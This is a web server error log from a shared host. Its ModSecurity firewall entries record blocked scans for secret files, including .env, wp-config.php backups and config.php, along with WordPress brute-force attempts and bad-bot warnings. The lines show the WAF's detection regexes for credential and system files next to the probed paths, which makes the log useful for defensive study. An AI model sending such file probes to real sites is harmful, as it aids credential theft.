[Tue May 26 18:36:16.245215 2026] [log_config:warn] [pid 1007701:tid 1007911] (32)Broken pipe: [client 223.237.158.236:54384] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://samayikprasanga.in/epaper.php?pn=1
[Tue May 26 18:36:16.298315 2026] [security2:error] [pid 1015481:tid 1015607] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backend/.env"] [unique_id "ahWayLQIKfWDMlp2INc8fwABPH0"]
[Tue May 26 18:36:16.347243 2026] [security2:error] [pid 1015481:tid 1015727] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWayLQIKfWDMlp2INc8egAAAX4"]
[Tue May 26 18:36:16.347282 2026] [security2:error] [pid 1015481:tid 1015727] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWayLQIKfWDMlp2INc8egAAAX4"]
[Tue May 26 18:36:16.349504 2026] [security2:error] [pid 1015481:tid 1015721] [client 65.21.113.244:33570] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWayLQIKfWDMlp2INc8dwAAAXg"]
[Tue May 26 18:36:16.445549 2026] [security2:error] [pid 1015481:tid 1015624] [client 74.249.212.138:1309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/x.php"] [unique_id "ahWayLQIKfWDMlp2INc8gwAAARc"]
[Tue May 26 18:36:16.445677 2026] [security2:error] [pid 1015481:tid 1015624] [client 74.249.212.138:1309] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/x.php"] [unique_id "ahWayLQIKfWDMlp2INc8gwAAARc"]
[Tue May 26 18:36:16.661994 2026] [security2:error] [pid 1015481:tid 1015600] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api/.env"] [unique_id "ahWayLQIKfWDMlp2INc8hwABVXY"]
[Tue May 26 18:36:16.922512 2026] [security2:error] [pid 1015481:tid 1015605] [remote 216.73.216.30:44730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWayLQIKfWDMlp2INc8jgABEXs"]
[Tue May 26 18:36:16.989317 2026] [security2:error] [pid 1015481:tid 1015654] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWayLQIKfWDMlp2INc8hgAAATU"]
[Tue May 26 18:36:17.154635 2026] [security2:error] [pid 1015481:tid 1015482] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config.php"] [unique_id "ahWaybQIKfWDMlp2INc8kAABGQA"]
[Tue May 26 18:36:17.384914 2026] [security2:error] [pid 1015481:tid 1015483] [remote 167.172.25.98:57386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWaybQIKfWDMlp2INc8kQABDgE"]
[Tue May 26 18:36:18.038374 2026] [security2:error] [pid 1015481:tid 1015484] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/settings.php"] [unique_id "ahWayrQIKfWDMlp2INc8pgABKQI"]
[Tue May 26 18:36:18.947160 2026] [security2:error] [pid 1015481:tid 1015489] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php"] [unique_id "ahWayrQIKfWDMlp2INc8uQABXAc"]
[Tue May 26 18:36:19.421266 2026] [security2:error] [pid 1015481:tid 1015624] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWayrQIKfWDMlp2INc8vwAAARc"]
[Tue May 26 18:36:19.533552 2026] [security2:error] [pid 1015481:tid 1015491] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config.php.bak"] [unique_id "ahWay7QIKfWDMlp2INc8xAABVQk"]
[Tue May 26 18:36:19.933136 2026] [security2:error] [pid 1015481:tid 1015494] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.backup"] [unique_id "ahWay7QIKfWDMlp2INc81AABCww"]
[Tue May 26 18:36:19.992446 2026] [security2:error] [pid 1015481:tid 1015738] [client 14.231.54.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWay7QIKfWDMlp2INc8yQAAAYk"]
[Tue May 26 18:36:20.543372 2026] [security2:error] [pid 1015481:tid 1015498] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.bak"] [unique_id "ahWazLQIKfWDMlp2INc85gABKRA"]
[Tue May 26 18:36:20.857852 2026] [security2:error] [pid 1015481:tid 1015716] [client 74.249.212.138:1281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/201.php"] [unique_id "ahWazLQIKfWDMlp2INc86gAAAXM"]
[Tue May 26 18:36:20.858016 2026] [security2:error] [pid 1015481:tid 1015716] [client 74.249.212.138:1281] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/201.php"] [unique_id "ahWazLQIKfWDMlp2INc86gAAAXM"]
[Tue May 26 18:36:20.890803 2026] [security2:error] [pid 1015481:tid 1015499] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.old"] [unique_id "ahWazLQIKfWDMlp2INc86wABKxE"]
[Tue May 26 18:36:20.899663 2026] [security2:error] [pid 1015481:tid 1015729] [client 172.226.42.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWazLQIKfWDMlp2INc86QAAAYA"]
[Tue May 26 18:36:20.928454 2026] [security2:error] [pid 1015481:tid 1015500] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWazLQIKfWDMlp2INc87AABRRI"]
[Tue May 26 18:36:20.928648 2026] [security2:error] [pid 1015481:tid 1015670] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWazLQIKfWDMlp2INc87AABRRI"]
[Tue May 26 18:36:21.128399 2026] [security2:error] [pid 1015481:tid 1015504] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.save"] [unique_id "ahWazbQIKfWDMlp2INc88QABKhY"]
[Tue May 26 18:36:21.412106 2026] [security2:error] [pid 1015481:tid 1015503] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.swp"] [unique_id "ahWazbQIKfWDMlp2INc89gABTxU"]
[Tue May 26 18:36:21.506495 2026] [security2:error] [pid 1015481:tid 1015669] [client 66.249.89.230:51359] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWazbQIKfWDMlp2INc89QAAAUQ"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:21.635863 2026] [security2:error] [pid 1015481:tid 1015505] [remote 178.104.90.233:42194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWazbQIKfWDMlp2INc89wABFhc"]
[Tue May 26 18:36:21.766130 2026] [security2:error] [pid 1015481:tid 1015508] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.txt"] [unique_id "ahWazbQIKfWDMlp2INc9BwABeBo"]
[Tue May 26 18:36:21.986009 2026] [security2:error] [pid 1015481:tid 1015724] [client 66.249.89.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWazbQIKfWDMlp2INc9BgAAAXs"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:22.047847 2026] [security2:error] [pid 1015481:tid 1015705] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWazbQIKfWDMlp2INc9AwAAAWg"]
[Tue May 26 18:36:22.173980 2026] [security2:error] [pid 1015481:tid 1015621] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWazrQIKfWDMlp2INc9EQAAARQ"]
[Tue May 26 18:36:22.174015 2026] [security2:error] [pid 1015481:tid 1015621] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWazrQIKfWDMlp2INc9EQAAARQ"]
[Tue May 26 18:36:22.174438 2026] [security2:error] [pid 1015481:tid 1015511] [remote 216.73.216.30:53337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWazrQIKfWDMlp2INc9EwABZB0"]
[Tue May 26 18:36:22.175218 2026] [security2:error] [pid 1015481:tid 1015667] [client 65.21.113.244:37546] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWazrQIKfWDMlp2INc9DQAAAUI"]
[Tue May 26 18:36:22.244177 2026] [security2:error] [pid 1015481:tid 1015663] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWazrQIKfWDMlp2INc9FQAAAT4"]
[Tue May 26 18:36:22.467368 2026] [core:error] [pid 1015481:tid 1015691] [client 66.249.66.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:36:22.467388 2026] [core:error] [pid 1015481:tid 1015691] [client 66.249.66.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:36:22.788576 2026] [security2:error] [pid 1015481:tid 1015632] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWazrQIKfWDMlp2INc9IgAAAR8"]
[Tue May 26 18:36:22.788609 2026] [security2:error] [pid 1015481:tid 1015632] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWazrQIKfWDMlp2INc9IgAAAR8"]
[Tue May 26 18:36:22.789772 2026] [security2:error] [pid 1015481:tid 1015676] [client 65.21.113.244:37550] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWazrQIKfWDMlp2INc9IAAAAUs"]
[Tue May 26 18:36:22.818853 2026] [security2:error] [pid 1015481:tid 1015646] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWazrQIKfWDMlp2INc9KAAAAS0"]
[Tue May 26 18:36:23.864829 2026] [security2:error] [pid 1015481:tid 1015686] [client 66.249.89.230:51359] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWaz7QIKfWDMlp2INc9OgAAAVU"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:24.117689 2026] [security2:error] [pid 1015481:tid 1015712] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa0LQIKfWDMlp2INc9SAAAAW8"]
[Tue May 26 18:36:24.188597 2026] [security2:error] [pid 1015481:tid 1015710] [client 66.249.89.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWaz7QIKfWDMlp2INc9QwAAAW0"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:24.613655 2026] [security2:error] [pid 1015481:tid 1015619] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa0LQIKfWDMlp2INc9XAAAARI"]
[Tue May 26 18:36:24.661889 2026] [security2:error] [pid 1015481:tid 1015729] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWa0LQIKfWDMlp2INc9YgAAAYA"]
[Tue May 26 18:36:24.661934 2026] [security2:error] [pid 1015481:tid 1015729] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWa0LQIKfWDMlp2INc9YgAAAYA"]
[Tue May 26 18:36:24.662735 2026] [security2:error] [pid 1015481:tid 1015668] [client 65.21.113.244:37546] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/blog-2/blog-boxed-bigtext/"] [unique_id "ahWa0LQIKfWDMlp2INc9XQAAAUM"]
[Tue May 26 18:36:25.031568 2026] [security2:error] [pid 1015481:tid 1015644] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa0LQIKfWDMlp2INc9YQAAASs"]
[Tue May 26 18:36:25.185857 2026] [security2:error] [pid 1015481:tid 1015631] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa0bQIKfWDMlp2INc9bgAAAR4"]
[Tue May 26 18:36:25.277040 2026] [security2:error] [pid 1015481:tid 1015623] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWa0bQIKfWDMlp2INc9dAAAARY"]
[Tue May 26 18:36:25.277065 2026] [security2:error] [pid 1015481:tid 1015623] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWa0bQIKfWDMlp2INc9dAAAARY"]
[Tue May 26 18:36:25.277887 2026] [security2:error] [pid 1015481:tid 1015662] [client 65.21.113.244:37560] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/blog-2/blog-boxed-bigtext/"] [unique_id "ahWa0bQIKfWDMlp2INc9cgAAAT0"]
[Tue May 26 18:36:25.296420 2026] [security2:error] [pid 1015481:tid 1015650] [client 74.7.175.164:55478] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.test.glorodrc.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWa0bQIKfWDMlp2INc9eAABMT0"]
[Tue May 26 18:36:25.708414 2026] [autoindex:error] [pid 1015481:tid 1015534] [remote 74.7.243.230:33016] AH01276: Cannot serve directory /home2/glorolle/public_html/zeexo/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:36:26.215779 2026] [security2:error] [pid 1015481:tid 1015659] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa0rQIKfWDMlp2INc9iQAAATo"]
[Tue May 26 18:36:26.233750 2026] [security2:error] [pid 1015481:tid 1015734] [client 66.249.89.230:51359] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa0rQIKfWDMlp2INc9gwAAAYU"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:26.510229 2026] [security2:error] [pid 1015481:tid 1015622] [client 74.249.212.138:23049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/ops.php"] [unique_id "ahWa0rQIKfWDMlp2INc9mgAAARU"]
[Tue May 26 18:36:26.510347 2026] [security2:error] [pid 1015481:tid 1015622] [client 74.249.212.138:23049] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/ops.php"] [unique_id "ahWa0rQIKfWDMlp2INc9mgAAARU"]
[Tue May 26 18:36:26.535960 2026] [security2:error] [pid 1015481:tid 1015619] [client 66.249.89.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa0rQIKfWDMlp2INc9lAAAARI"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:26.573902 2026] [security2:error] [pid 1015481:tid 1015694] [client 124.43.5.103:20137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWa0rQIKfWDMlp2INc9lgAAAV0"]
[Tue May 26 18:36:26.574074 2026] [security2:error] [pid 1015481:tid 1015694] [client 124.43.5.103:20137] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWa0rQIKfWDMlp2INc9lgAAAV0"]
